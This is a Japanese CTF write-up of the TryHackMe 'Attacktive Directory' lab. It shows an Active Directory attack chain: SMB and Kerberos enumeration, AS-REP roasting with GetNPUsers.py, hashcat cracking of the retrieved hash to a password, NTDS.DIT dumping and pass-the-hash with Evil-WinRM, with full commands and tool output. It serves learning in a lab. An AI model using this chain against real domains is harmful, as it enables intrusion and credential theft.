最初に
Task 1:Deploy The Machine
OpenVPNの設定について記載されています。
まだの人は設定しておいた方が作業しやすいと思います!
Task 2:Setup
以下の3つのツールのインストール手順が説明されています
- Impacket
- Bloodhound
- Neo4j
Task 3:Welcome to Attacktive Directory
ここからが本題です!
What tool will allow us to enumerate port 139/445?
ポート番号139/455はSMBのポートで、SMBの詳細情報を取得するのは、enum4linuxです
What is the NetBIOS-Domain Name of the machine?
enum4linuxの出力結果からドメインがTHM-ADだとわかります(enum4linuxの出力結果に全出力を記載しています)
NetBIOSは、Windowsネットワークの初期の名前解決メカニズムで、主にローカルネットワーク内で使用されます。
Active Directoryと同じようにドメインもあります
What invalid TLD do people commonly use for their Active Directory Domain?
これはあまり知見がなかったので、調べましたが、.localがよく使われるみたいですね
Task 4:Enumerating Users via Kerberos
kerbruteがインストールされていなかったので、以下の手順でインストールしました
- Golangのインストール
sudo apt install golang - 実行ファイルのダウンロード
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.2/kerbrute_linux_amd64 - 名前を変更
mv kerbrute_linux_amd64 kerbrute - 実行権限の付与
chmod +x kerbrute
インストールできたので、とりあえず実行してみます
What command within Kerbrute will allow us to enumerate valid usernames?
とりあえず実行してみた時の出力に、usernameをみつけるオプションとして、userenumがあり、それが対応しています
What notable account is discovered? (These should jump out at you)
あまり使ったことがない実行ファイルなので、どこになにを記載するのかわかりにくく迷いましたが、Writeupを参考に以下コマンドを実行すればうまくいきました
ちなみにADのドメインはnmapの中に記載がありました(これは見落とす・・・)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
(文字数的に)svc-adminを選びました
What is the other notable account is discovered? (These should jump out at you)
(文字数的に)backupをえらびました
真面目に答えると、バックアップ情報には様々な種類のデータがあるので、とても有用だと考えたからです(棒)
Task 5: Abusing Kerberos
ここからはKerberosを実際に攻撃していきます!
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
GetNPUsers.pyを使えば、一部アカウントでKerberosからのチケットを確認できるみたい
さっそく先ほどの問題で列挙した二つのアカウントについて実行してみます
┌──(root㉿kali)-[/opt/impacket/examples]
└─# python3 GetNPUsers.py -dc-ip 10.10.218.113 -no-pass spookysec.local/backup
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(root㉿kali)-[/opt/impacket/examples]
└─# python3 GetNPUsers.py -dc-ip 10.10.218.113 -no-pass spookysec.local/svc-admin
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f872f2d8f01ca7b43b17652504d8d99$31989073ed469875c846fb485b7703c38925466d801416d6f28fff0306e9d9fba9213f36142c9f056b30e948f15bd5285b1d546a174209517db95f134893c7bfb9410d2d36c6b440d5af53965559628db27aeae9279c32efbfdda0476c1c1dd86e96b71bf12edd65e0779f67cf7c3d4d5724a65b06f2327b900d3371905a9457203fc9d249b34366c2fbe439b28b73df658ad297d7aa8402698dc83b69248333c228fe77027b3b81a91f81b2f6f6e5319869602dd08dac7e473632083c0ee91711f1d655a013c3d362ac73c7c68dbb8c614b73e1175e4094612212a85a9118a11f432dbc56895ac072c217aaf117ff5a85fa
svc-adminの方がヒットしましたね
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
krb5asrepが特徴的なHashです!
HashcatのWikiは以下のURLから確認できます
What mode is the hash?
このモードはhashcatを使う際に指定することで、モードと対応しているHashでデコードしてくれます
答えは下図にあります。
Now crack the hash with the modified password list provided, what is the user accounts password?
hash_svc-admin.txtにsvc-adminのHash値を記載し、TryHackMeのページで配布されていたpasswordlist.txtを使ってhashcatします
hashcat -m 18200 hash_svc-admin.txt passwordlist.txt
無事にHash値からパスワードが抜き取れました!
(全出力はsvc-adminのHash値のクラックに記載)
Task 6:Back to the Basics
What utility can we use to map remote SMB shares?
smbclientです!
ちなみにsmbmapもよく使います
Which option will list shares?
下図はsmbclient -hの結果です。共有されているアカウントの情報を列挙するのは-Lです
How many remote shares is the server listing?
-Lした結果です!
There is one particular share that we have access to that contains a text file. Which share is it?
上から順番にアクセスしてみたところ、backupでアクセスできました!
What is the content of the file?
getしてからローカルで開くことができます
Decoding the contents of the file, what is the full contents?
Dencodeなどを使ってデコードします!
そうするとbackupakアカウントの認証情報が手に入ります
ちなみにこの情報でsmbclientのアクセスも可能です
Task 7: Elevating Privileges within the Domain
特権昇格を目指して、いろいろな情報を取得します!
What method allowed us to dump NTDS.DIT?
話の展開的にsecretdump.pyを使うと思ったので、とりあえず-hしてみる
上図の赤枠のところが基本構文のようなので、それに合わせて実施してみると、NTDS.DITの記載がありました
NTDS.DITは知らなかったので、調べてみましたが、Active Directoryのユーザーオブジェクトやグループ、パスワードハッシュを格納しているみたいですね
What is the Administrators NTLM hash?
AdministratorsのHash値はいくつかありますが、Hashcat のExample HashesのNTLMの例から似た形のものを見つけてきます(人力)
What method of attack could allow us to authenticate as the user without the password?
ごめんなさい、ググりました
Using a tool called Evil-WinRM what option will allow us to use a hash?
EvilWinRMを以下のQiitaの記事を参考にインストールしました
以下のコマンドを実行して、オプションを出力したのが下図です。
ここからハッシュに関わるものを見つけます!
evil-winrm -h
ちなみにnmapの結果、ポート番号5985はあいていました!
Task 8: Flag Submission Panel
正直、ここで沼にはまりました
てっきり、Evil-WinRMで使うアカウントが3つだと思い込んでいましたが、実際はAdministratorでアクセスして、ディレクトリを移動して、ほかのユーザーの情報にアクセスしているだけでした。。。
ちゃんと問題文を読んでいればよかった。。。
最後に
今回学んだことは以下2つです!
- ポート139/445が開いていれば、enum4linuxを試してみる
- Kerberosが動作していれば以下の流れで攻撃をしかける(CTF環境でのみ)(間違っていたらご指摘ください)
- Kerbrute のuserenumオプションでユーザー名を列挙
- ImpacketのGetNPUsers.pyでKerberosのチケットのハッシュ値を見つける
- Kerberosの認証情報を手に入れれば、secretsdump.pyで、ユーザー名とPWのハッシュ値を手に入れる
- Evil-WinRMで一つ前で手に入れたIDとPWのハッシュ値で侵入する
メモ
Nmapの結果
─# nmap -sV -O -script vuln 10.10.57.238 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 17:16 JST
Nmap scan report for 10.10.57.238
Host is up (0.25s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-14 08:22:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3389/tcp open ms-wbt-server Microsoft Terminal Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/14%OT=53%CT=1%CU=38566%PV=Y%DS=2%DC=I%G=Y%TM=670
OS:CD85C%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=108%TI=I%II=I%SS=S%TS=U)
OS:SEQ(SP=FE%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=FE%GCD=1%ISR=108
OS:%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=FE%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS
OS:=U)SEQ(SP=FE%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M508NW8NNS%O2
OS:=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS%O6=M508NNS)WIN(W1=FFF
OS:F%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M50
OS:8NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=
OS:)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:O%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1257.51 seconds
enum4linuxの出力結果
# enum4linux -a 10.10.57.238
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Oct 14 17:41:08 2024
=========================================( Target Information )=========================================
Target ........... 10.10.57.238
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.57.238 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.57.238 )================================
Looking up status of 10.10.57.238
No reply from 10.10.57.238
===================================( Session Check on 10.10.57.238 )===================================
[+] Server 10.10.57.238 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.57.238 )================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.57.238 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.57.238 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.57.238 )=======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=================================( Share Enumeration on 10.10.57.238 )=================================
do_connect: Connection to 10.10.57.238 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.57.238
============================( Password Policy Information for 10.10.57.238 )============================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.57.238 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.57.238)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=======================================( Groups on 10.10.57.238 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.57.238 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963
[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963
[+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''
S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)
S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
S-1-5-21-3591857110-2884097990-301047963-512 THM-AD\Domain Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-513 THM-AD\Domain Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-514 THM-AD\Domain Guests (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-515 THM-AD\Domain Computers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-516 THM-AD\Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-517 THM-AD\Cert Publishers (Local Group)
S-1-5-21-3591857110-2884097990-301047963-518 THM-AD\Schema Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-519 THM-AD\Enterprise Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-520 THM-AD\Group Policy Creator Owners (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-521 THM-AD\Read-only Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-522 THM-AD\Cloneable Domain Controllers (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-525 THM-AD\Protected Users (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-526 THM-AD\Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-527 THM-AD\Enterprise Key Admins (Domain Group)
S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)
[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
===============================( Getting printer info for 10.10.57.238 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Mon Oct 14 17:56:34 2024
svc-adminのHash値のクラック
┌──(root㉿kali)-[/home/…/Documents/THM/Medium/AttacktiveDirectory]
└─# hashcat -m 18200 hash_svc-admin.txt passwordlist.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-12th Gen Intel(R) Core(TM) i5-12450H, 1439/2942 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f872f2d8f01ca7b43b17652504d8d99$31989073ed469875c846fb485b7703c38925466d801416d6f28fff0306e9d9fba9213f36142c9f056b30e948f15bd5285b1d546a174209517db95f134893c7bfb9410d2d36c6b440d5af53965559628db27aeae9279c32efbfdda0476c1c1dd86e96b71bf12edd65e0779f67cf7c3d4d5724a65b06f2327b900d3371905a9457203fc9d249b34366c2fbe439b28b73df658ad297d7aa8402698dc83b69248333c228fe77027b3b81a91f81b2f6f6e5319869602dd08dac7e473632083c0ee91711f1d655a013c3d362ac73c7c68dbb8c614b73e1175e4094612212a85a9118a11f432dbc56895ac072c217aaf117ff5a85fa:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f872f2d8f0...5a85fa
Time.Started.....: Mon Oct 14 21:28:33 2024 (0 secs)
Time.Estimated...: Mon Oct 14 21:28:33 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 394.3 kH/s (0.93ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 6656/70188 (9.48%)
Rejected.........: 0/6656 (0.00%)
Restore.Point....: 6144/70188 (8.75%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: horoscope -> amy123
Hardware.Mon.#1..: Util: 47%
Started: Mon Oct 14 21:28:11 2024
Stopped: Mon Oct 14 21:28:35 2024